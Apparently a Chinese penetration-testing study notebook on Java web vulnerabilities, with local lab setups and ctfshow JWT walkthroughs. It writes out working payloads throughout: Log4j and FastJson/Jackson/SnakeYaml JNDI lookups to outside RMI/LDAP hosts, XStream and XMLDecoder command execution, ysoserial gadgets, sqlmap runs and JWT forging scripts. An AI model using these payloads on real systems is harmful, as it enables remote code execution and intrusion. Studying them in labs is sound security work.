Java安全

Java安全

Java2Sec靶场搭建

靶场地址

https://github.com/bewhale/JavaSec

查看数据库配置文件，mysql，用户名密码根据自己数据库密码更改

使用小皮面板的mysql，新建一个数据名为javasec的数据库

运行javasec.sql文件

下载运行jar包即可

java -jar javasec-0.0.1-SNAPSHOT.jar

访问本地8000端口，用户名密码admin，admin

Hello-Java-Sec靶场搭建

靶场地址

https://github.com/j3ers3/Hello-Java-Sec

查看数据库配置文件，mysql，用户名密码根据自己数据库密码更改

使用小皮面板的mysql，新建一个数据名为test的数据库

运行db.sql文件

下载运行jar包即可

java -jar javasec-1.10.jar

访问本地8888端口，用户名密码admin，admin

SQL注入

JDBC

1、采用Statement方法拼接SQL语句

2、PrepareStatement会对SQL语句进行预编译，但如果直接采取拼接的方式构造SQL，此时进行预编译也无用。

3、JDBCTemplate是Spring对JDBC的封装，如果使用拼接语句便会产生注入

安全写法：SQL语句占位符（?） + PrepareStatement预编译

MyBatis

MyBatis支持两种参数符号，一种是#，另一种是KaTeX parse error: Expected 'EOF', got '#' at position 2: ，#̲使用预编译，使用拼接SQL。

1、order by注入：由于使用#{}会将对象转成字符串，形成order by “user” desc造成错误，因此很多研发会采用${}来解决，从而造成注入.

2、like 注入：模糊搜索时，直接使用’%#{q}%’ 会报错，部分研发图方便直接改成’%${q}%'从而造成注入.

3、in注入：in之后多个id查询时使用 # 同样会报错，从而造成注入.

代码审计案例

inxedu后台MyBatis注入

修改配置文件

使用mysql5.5.29

直接运行sql文件

白盒审计思路

查看外部引用库

引用了Mybatis库说明使用Mybatis库

搜索%${

搜索(${，

路由地址是访问delete

路由地址是/admin/article

访问/admin/article/delete

点击删除可以看到提交了articelld数据，刚刚接受的也是articelId

将数据包复制出来，在注入点加上*

使用sqlmap跑出注入点

跑出表单名

python sqlmap.py -r "C:\Users\强少张\Desktop\1.txt" --batch --tables

XXE注入-Reader&Builder

XXE (XML External Entity Injection), XML外部实体注入，当开发人员配置其XML解析功能允许外部实体引用时，攻击者可利用这一可引发安全问题的配置方式，实施任意文件读取、内网端口探测、命令执行、拒绝服务等攻击。

审计的函数

XMLReader
SAXReader
DocumentBuilder
XMLStreamReader
SAXBuilder
SAXParser
SAXSource
TransformerFactory
SAXTransformerFactory
SchemaFactory
Unmarshaller
XPathExpression

SSTI模版-Thymeleaf&URL

SSTI(Server Side Template Injection) 服务器模板注入, 服务端接收了用户的输入，将其作为 Web 应用模板内容的一部分，在进行目标编译渲染的过程中，执行了用户插入的恶意内容。
1、URL作视图
2、Velocity
3、Thymeleaf

__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("calc").getInputStream()).next()}__::

其他语言参考：https://www.cnblogs.com/bmjoker/p/13508538.html

SPEL表达式-SpringBoot框架

SpEL（Spring Expression Language）表达式注入, 是一种功能强大的表达式语言、用于在运行时查询和操作对象图，由于未对参数做过滤可造成任意命令执行。
1、Spring表达式
2、Spring反射绕过

审计的函数

SpelExpressionParser

getValue

参考：https://www.jianshu.com/p/e3c77c053359

T(java.lang.Runtime).getRuntime().exec("calc")

RCE执行

审计函数

RuntimeExec

ScriptEngineManager

var a = mainOutput();
function mainOutput() { var x=java.lang.Runtime.getRuntime().exec("calc")};

引用js文件执行rce漏洞

Groovy

ProcessBuilder

ProcessImpl

检测：（大部分白盒）
黑盒看参数名和参数值
白盒看类函数名和可控变量

JNDI注入-RMI&LDAP&版本

什么是jndi注入
为什么有jndi注入
JDNI注入安全问题（RCE）
JDNI注入利用条件（看上图）
参考：https://blog.csdn.net/dupei/article/details/120534024

#JNDI注入-RMI&LDAP服务&高版本
资料：https://docs.qq.com/doc/DQ3JySmFPZXJkUVBL

JNDI全称为 Java Naming and DirectoryInterface（Java命名和目录接口），是一组应用程序接口，为开发人员查找和访问各种资源提供了统一的通用接口，可以用来定义用户、网络、机器、对象和服务等各种资源。JNDI支持的服务主要有：DNS、LDAP、CORBA、RMI等。
RMI：远程方法调用注册表
LDAP：轻量级目录访问协议

调用检索：

Java为了将Object对象存储在Naming或Directory服务下，提供了Naming Reference功能，对象可以通过绑定Reference存储在Naming或Directory服务下，比如RMI、LDAP等。javax.naming.InitialContext.lookup()
在RMI服务中调用了InitialContext.lookup()的类有：
org.springframework.transaction.jta.JtaTransactionManager.readObject()
com.sun.rowset.JdbcRowSetImpl.execute()
javax.management.remote.rmi.RMIConnector.connect()
org.hibernate.jmx.StatisticsService.setSessionFactoryJNDIName(String sfJNDIName)

在LDAP服务中调用了InitialContext.lookup()的类有：

InitialDirContext.lookup()
Spring LdapTemplate.lookup()
LdapTemplate.lookupContext()

检测：
无黑盒思路
白盒看类函数名和可控变量

使用**JNDI-Injection-Exploit**构造jndi链

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc" -A 192.168.100.2

不安全组件

JSON&XML&验证&日志

-FastJson：

阿里巴巴公司开源的json解析器，它可以解析JSON格式的字符串，支持将JavaBean序列化为JSON字符串，也可以从JSON字符串反序列化到JavaBean。
历史漏洞：https://avd.aliyun.com/search?q=fastjson

-黑盒测试不安全组件漏洞：
见后续章节漏洞复现利用课程

-白盒审计不安全组件漏洞：

{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://192.168.100.2:1099/s59vaf","autoCommit":true}

-Log4j：

Apache的一个开源项目，是一个基于Java的日志记录框架。
历史漏洞：https://avd.aliyun.com/search?q=Log4j

${jndi:rmi://192.168.100.2:1099/s59vaf}

${jndi:ldap://jiwxpwcups.dgrh3.cn}

-Shiro：

Java安全框架，能够用于身份验证、授权、加密和会话管理。
历史漏洞：https://avd.aliyun.com/search?q=Shiro

黑盒：登录框架有remember

抓取登录数据地址

爆破密钥和利用链，执行代码

-Jackson：

当下流行的json解释器，主要负责处理Json的序列化和反序列化。
历史漏洞：https://avd.aliyun.com/search?q=Jackson

["com.nqadmin.rowset.JdbcRowSetImpl",{"dataSourceName":"rmi://192.168.100.2:1099/s59vaf","autoCommit":"true"}]

-XStream：

开源Java类库，能将对象序列化成XML或XML反序列化为对象
历史漏洞：https://avd.aliyun.com/search?q=XStream

<sorted-set><dynamic-proxy><interface>java.lang.Comparable</interface><handler class="java.beans.EventHandler"><target class="java.lang.ProcessBuilder"><command><string>calc</string></command></target><action>start</action></handler></dynamic-proxy></sorted-set>

先clean一下再install

执行sql文件

案例

FastJson审计

1、看引用组件版本及实现
JSON.parse() JSON.parseObject()

搜索JSON.parseObject

2、找可控变量及访问实现propertyJson，路径地址为admin/product，@RequestParam是springboot传入

查看引用库是否有fastjson

找到admin/product，进行抓包找到propertyJson

3、测试出网回显调用访问

{"@type":"java.net.Inet4Address","val":"zrpqhbvwbc.dgrh3.cn"}

Log4j审计

1、看引用组件版本及实现
logger.info logger.error

搜索logger.info，找到有变量的地方

2、找可控变量及访问实现

admin/uploadAdminHeadImage originalFileName

originalFileName是获取文件名file.getOriginalFilename()参数，文件名是可控的，路径是admin/uploadProductImage

在配置文件中查看是否有log4j

上传一个图片是uploadProductImage路径

抓一下文件上传包

3、测试出网回显调用访问

修改上传文件名

${jndi:ldap://uzlhyodwsr.dgrh3.cn}

${jndi:rmi://192.168.100.2:1099/rierdi}

不回显常见判断通用方法：
1、直接将执行结果写入到静态资源文件里，如html、js等，然后访问。
2、通过dnslog进行数据外带，但如果无法执行dns请求就无法验证了。
3、接将命令执行结果回显到请求Poc的HTTP响应中。
不回显常见判断细节方法：
例：https://mp.weixin.qq.com/s/qhLhgbNwocC07AN48eQ0sw

反序列化-原生序列化类函数

序列化是将Java对象转换成字节流的过程。而反序列化是将字节流转换成Java对象的过程，java序列化的数据一般会以标记ac ed 00 05开头，base64编码的特征为rO0AB，JAVA常见的序列化和反序列化的方法有JAVA 原生序列化和JSON 类（fastjson、jackson）序列化等。

0、黑盒发现（流量捕获）
0、白盒发现（特征类接口函数）

利用项目：

Yakit

ysoserial

wget https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar
java -jar ysoserial-all.jar

SerializedPayloadGenerator

原生序列化类函数：

SnakeYaml

SnakeYaml：完整的YAML1.1规范Processor，支持Java对象的序列化/反序列化

!!com.sun.rowset.JdbcRowSetImpl {dataSourceName: 'rmi://192.168.100.2:1099/pw37y7', autoCommit: true}

XMLDecoder.readObject()

XMLDecoder：xml语言格式序列化类函数接口

使用XMLDecoder解析后再调用readObject()方法

<?xml version="1.0" encoding="UTF-8"?><java version="1.8.0_151" class="java.beans.XMLDecoder">    <object class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="3">            <void index="0">                <string>cmd</string>            </void>            <void index="1">                <string>/c</string>            </void>            <void index="2">                <string>calc</string>            </void>        </array>        <void method="start" />    </object></java>

ObjectInputStream.readObject()

ObjectInputStream.readObject()：任何类如果想要序列化必须实现java.io.Serializable接口

java -jar ysoserial-all.jar CommonsCollections5 "cmd /c calc" | base64 -w0

SpringBoot框架-泄漏&CVE

SpringBoot Actuator模块提供了生产级别的功能，比如健康检查，审计，指标收集，HTTP跟踪等，帮助我们监控和管理Spring Boot应用。

检测清单

黑盒发现

人工识别

fofa语法：body=“Whitelabel Error Page” && icon_hash=“116323821”

图标是小叶子，报错内容是Whitelabel Error Page

BP指纹识别插件

白盒发现

pom.xml

<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-actuator</artifactId>
</dependency>

引用库：Actuator

#Actuator设置全部暴露
management.endpoints.web.exposure.include=*

安全配置

泄漏安全（配置密码，AK/SK等）

JDumpSpider

heapdump_tool

需要java8之前版本或者Java部分版本，因为已经jhat已经被移除了

漏洞安全（利用类，CVE漏洞等）

SpringBoot-Scan

我的工具箱有集成，需要的可以私信

SpringBootVulExploit

案例一

使用SpringBoot-Scan扫描springboot网址

SSpringBoot-Scan-V2.51_Win_x64_2024年龙年新春贺岁版.exe -u http://127.0.0.1:8000

扫描出信息泄露

访问http://127.0.0.1:8000/actuator/heapdump下载heapdump

使用JDumpSpider解析heapdump

java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump

使用SpringBootVulExploit进行漏洞扫描利用

使用JNDIExploit-1.3-SNAPSHOT创建一个JNDI注入环境

java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 127.0.0.1 -l 1389 -p 3456

点击连接，利用jolokiaLogbackRCE,利用失败，应该是java版本过高导致的

使用SpringBoot-Scan检测漏洞

SpringBoot-Scan.exe -v http://127.0.0.1:8000

案例二

创建一个rbac数据库，执行sql文件

在Maven先clean再install

全局搜索actuator

在pom.xml中引用了

查看配置文件

Actuator设置全部暴露

访问网站burp被动扫描

访问/actuator/heapdump下载heapdump文件

使用JDumpSpider-1.1-SNAPSHOT-full.jar扫描heapdump文件

java -jar JDumpSpider-1.1-SNAPSHOT-full.jar "heapdump (1)"

使用springboot-scan检测漏洞

SpringBoot-Scan.exe -v 192.168.100.2:8088

使用SpringBootExploit检测漏洞

Druid监控-未授权访问&信息泄漏

参考：https://developer.aliyun.com/article/1260382

Druid是阿里巴巴数据库事业部出品，为监控而生的数据库连接池。Druid提供的监控功能，监控SQL的执行时间、监控Web URI的请求、Session监控。当开发者配置不当时就可能造成未授权访问漏洞。

攻击点：

1、直接拼接URL路径：druid，尝试能否直接未授权访问系统功能点。

2、结合泄露URL路径和Session信息，利用BurpSuite进行尝试登录。

3、利用Cookie编辑器替换Session，再次访问后台路径尝试进入后台。

Swagger接口-导入&联动批量测试

Swagger是一个用于生成、描述和调用RESTful接口的Web服务。就是将项目中所有（想要暴露的）接口展现在页面上，并可以进行接口调用和测试的服务。所以可以对这个接口进行漏洞测试，看是否存在未授权访问、sql注入、文件上传等漏洞。由于接口太多，一个个接口测试的话太费时间，所以一般会采用自动化接口漏洞安全测试。

1、自动化发包测试

Postman：https://github.com/hlmd/Postman-cn

点击导入选择链接

点击运行，勾选保存响应，如果有文件上传点可以选择上传文件

运行报错

将变量初始值和当前值//删除

再重新运行

2、自动化漏洞测试

postman联动BurpSuite 转发Xray

使用工具箱里的图形化xray，设置好IP端口，开启被动监听

使用postman再次发包，xray成功接到数据包，扫描完毕打开扫描结果

JWT令牌-空算法&未签名&密匙获取

JSON Web Token(JWT)。它遵循JSON格式，将用户信息加密到token里，服务器不保存任何用户信息，只保存密钥信息，通过使用特定加密算法验证token，通过token验证用户身份。基于token的身份验证可以替代传统的cookie+session身份验证方法。这使得JWT成为高度分布式网站的热门选择，在这些网站中，用户需要与多个后端服务器无缝交互。

JWT识别

1、标头（Header）

Header是JWT的第一个部分，是一个JSON对象，主要声明了JWT的签名算法，如"HS256”、“RS256"等，以及其他可选参数，如"kid”、“jku”、"x5u"等

alg字段通常用于表示加密采用的算法。如"HS256"、"RS256"等

typ字段通常用于表示类型

还有一些其他可选参数，如"kid"、“jku”、"x5u"等

2、有效载荷（Payload）

Payload是JWT的第二个部分，这是一个JSON对象，主要承载了各种声明并传递明文数据，用于存储用户的信息，如id、用户名、角色、令牌生成时间和其他自定义声明。

iss：该字段表示jwt的签发者。

sub：该jwt面向的用户。

aud：jwt的接收方。

exp：jwt的过期时间,通常来说是一个时间戳。

iat：jwt的签发时间,常来说是一个时间戳。

jti：此jwt的唯一标识。通常用于解决请求中的重放攻击。该字段在大多数地方没有被提及或使用。因为使用此字段就意味着必须要在服务器维护一张jti表， 当客户端携带jwt访问的时候需要在jti表中查找这个唯一标识是否被使用过。使用这种方式防止重放攻击似乎让jwt有点怪怪的感觉, 毕竟jwt所宣称的优点就是无状态访问

签名（Signature）

Signature是对Header和Payload进行签名，具体是用什么加密方式写在Header的alg 中。同时拥有该部分的JWT被称为JWS，也就是签了名的JWT。

对Header和Payload进行签名，具体是用什么加密方式写在Header的alg中。

同时拥有该部分的JWT被称为JWS，也就是签了名的JWT。

第一部分：对 JSON 的头部做 base64 编码处理得到

第二部分：对 JSON 类型的 payload 做 base64 编码处理得到

第三部分：分别对头部和载荷做base64编码，并使用.拼接起来

使用头部声明的加密方式，对base64编码前两部分合并的结果加盐加密处理，作为JWT

在线解析：https://jwt.io/

BURP插件

Hae

JSON Web Tokens

burp市场地址

下载的bapp后缀文件再商店中导入

JWT安全

1、空加密算法（攻击头部不使用加密）

签名算法可被修改为none，JWT支持将算法设定为"None"。如果"alg"字段设为"None"，那么签名会被置空，这样任何token都是有效的。

2、未校验签名（攻击签名不使用签名认证）

某些服务端并未校验JWT签名，可以尝试修改payload后然后直接请求token或者直接删除signature再次请求查看其是否还有效。

3、暴力破解密钥（攻击签名知道密钥实现重组）

针对是对称加密算法（非对称没有用）

非对称要使用方法：获取源码或者公钥私钥文件

某些签名算法，例如HS256（HMAC+SHA-256），会像密码一样使用一个任意的、独立的字符串作为秘密密钥。这个秘钥如被轻易猜到或暴力破解，则攻击者能以任意的头部和载荷值来创建JWT，然后用密钥重新给令牌签名。

4、其他安全参考：（源码泄漏密匙，Kid注入等）

https://blog.csdn.net/weixin_44288604/article/details/128562796

JWT利用

利用项目：https://github.com/ticarpi/jwt_tool

ctfshow-345(None无签名认证)

HAE检测到JWT

使用官方识别一下JWT数据，这里只要两部分没有签名

jwt是以base64加密的，先用Decoder模块解密修改user为admin再进行base64加密

替换JWT数据，拿到flag

ctfshow-346(None算法绕过签名)

JSON-Web Tokens插件已经识别

直接使用JSON-Web Tokens修改

使用jwt_tool进行解析

python jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTcxNjQ1NTEyNCwiZXhwIjoxNzE2NDYyMzI0LCJuYmYiOjE3MTY0NTUxMjQsInN1YiI6InVzZXIiLCJqdGkiOiJmNjgzNWQ5ZGFmOWJlMmEyYjQwNzc1MDVjYmQ3N2MwYiJ9.kjG4plzd85B-CL9OdNDUDk5bVon1HR-pgj8nhSO6-WI

修改JWT数据，修改加密为None，sub为admin

python jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTcxNjQ1NTEyNCwiZXhwIjoxNzE2NDYyMzI0LCJuYmYiOjE3MTY0NTUxMjQsInN1YiI6InVzZXIiLCJqdGkiOiJmNjgzNWQ5ZGFmOWJlMmEyYjQwNzc1MDVjYmQ3N2MwYiJ9.kjG4plzd85B-CL9OdNDUDk5bVon1HR-pgj8nhSO6-WI -T

去掉签名部分，发送数据

ctfshow-347(弱口令密钥获取)

使用jwt_tool爆破密钥

python jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTcxNjQ1NjU5MSwiZXhwIjoxNzE2NDYzNzkxLCJuYmYiOjE3MTY0NTY1OTEsInN1YiI6InVzZXIiLCJqdGkiOiI3NWI5ZWJiYjFmNmJiMzc0OWRlYzljMjUzYTlkMjk3NiJ9.ng9Ry27tXVv6UdpM4oWc6RyCyOvFulHMayqXLC0DL60 -C -d "D:\Infiltration\ASSETS\字典\fuzz\Password\Sucuri-Top-Wordpress-Passwords.txt"

验证123456是不是密钥

python jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTcxNjQ1NjU5MSwiZXhwIjoxNzE2NDYzNzkxLCJuYmYiOjE3MTY0NTY1OTEsInN1YiI6InVzZXIiLCJqdGkiOiI3NWI5ZWJiYjFmNmJiMzc0OWRlYzljMjUzYTlkMjk3NiJ9.ng9Ry27tXVv6UdpM4oWc6RyCyOvFulHMayqXLC0DL60 -C -p 123456

在官网上修改jwt数据

复制修改好的JWT数据成功拿到flag

ctfshow-348(爆破密钥上题一样)

使用jwt_tool爆破密钥

python jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTcxNjQ2MDg2NiwiZXhwIjoxNzE2NDY4MDY2LCJuYmYiOjE3MTY0NjA4NjYsInN1YiI6InVzZXIiLCJqdGkiOiIyMGUxODIyNDZkMTQ1YmUzYWYwYTU4MDVkZmRmZTY1NiJ9.zZdv09bsfIsfEqWt0LLt2Kei1ieoj_PI-OFOlSehMAA -C -d "D:\Infiltration\ASSETS\字典\fuzz\Password\Sucuri-T
op-Wordpress-Passwords.txt"

在官网上修改jwt数据

ctfshow-349（公钥私钥泄露）

JS提示，公钥私钥泄露，RSA都是以公钥加密，私钥解密，这个题是私钥加密，公钥解密

访问/private.key下私钥，利用python脚本加密jwt，需要安装jwt 和pyjwt

import jwt
public = open('private.key', 'r').read()
payload={"user":"admin"}
print(jwt.encode(payload, key=public, algorithm='RS256'))

修改JWT使用post提交

ctfshow-350(密钥混淆攻击RS256=>HS256)

代码逻辑是以private,RS256非对称加密,但是没有private文件

解密只需要public解密，使用public，HS256对称加密，那么解密也会以public解密

使用js编写脚本，使用py加密出来的jwt有点问题，不知道怎么回事。

var jwt = require('jsonwebtoken');

var fs = require('fs');

var privateKey = fs.readFileSync('./public.key');

var token = jwt.sign({ 'user': 'admin' }, privateKey, { algorithm: 'HS256' });

console.log(token)

替换jwt拿到flag

黑盒JWT测试

首先找到需要JWT鉴权后才能访问的页面，如个人资料页面，将该请求包重放测试：

1）未授权访问：删除Token后仍然可以正常响应对应页面

2）敏感信息泄露：通过JWt.io解密出Payload后查看其中是否包含敏感信息，如弱加密的密码等

3）破解密钥+越权访问：通过JWT.io解密出Payload部分内容，通过空加密算法或密钥爆破等方式实现重新签发Token并修改Payload部分内容，重放请求包，观察响应包是否能够越权查看其他用户资料

4）检查Token时效性：解密查看payload中是否有exp字段键值对（Token过期时间），等待过期时间后再次使用该Token发送请求，若正常响应则存在Token不过期

5）通过页面回显进行探测：如修改Payload中键值对后页面报错信息是否存在注入，payload中kid字段的目录遍历问题与sql注入问题